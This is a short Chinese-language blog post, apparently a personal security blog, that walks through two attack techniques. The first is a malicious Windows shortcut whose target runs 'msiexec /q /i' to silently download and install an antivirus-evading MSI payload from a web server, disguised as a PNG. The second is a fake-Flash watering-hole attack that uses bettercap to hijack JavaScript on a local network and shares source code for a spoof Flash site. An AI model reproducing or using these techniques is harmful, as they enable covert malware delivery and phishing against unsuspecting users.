向别人学习——lnk马、flash水坑
首页 > 学习    作者:Iamyc   2019年12月17日 14:13 星期二   热度:1362°   百度已收录  
时间:2019-12-17 14:13   热度:1362° 

一、lnk马

刚刚去吐司逛,看到一篇比较实际有效的文章,所以自己复现了下。

首先用cs或者msf生成msi马,然后做下免杀(道理都懂),然后移到公网web目录下

这时候可以是msi文件,也可以是png文件。

新建一个lnk文件,配置下:



目标那里设置:

C:\Windows\System32\msiexec.exe /q /i http://***/powershell.png

然后双击就行。

当然,没做免杀的话,win10会自动拦截

参考文章:

白帽100安全攻防实验室

二、flash水坑

flash水坑攻击最近流行的也多,也顺带记录下来。

flash水坑其实内网用的可能比较多,当然,公网也可以打倒是。

内网的话,可以用bettercap劫持js,让对方跳到你的站上去下载payload。

分享下钓鱼flash官网源码:Fake-flash.cn-master.zip

重生里也有大佬实践过,我就不赘述了,分享转载下:flash apt

二维码加载中...
本文作者:Iamyc      文章标题: 向别人学习——lnk马、flash水坑
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=119
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog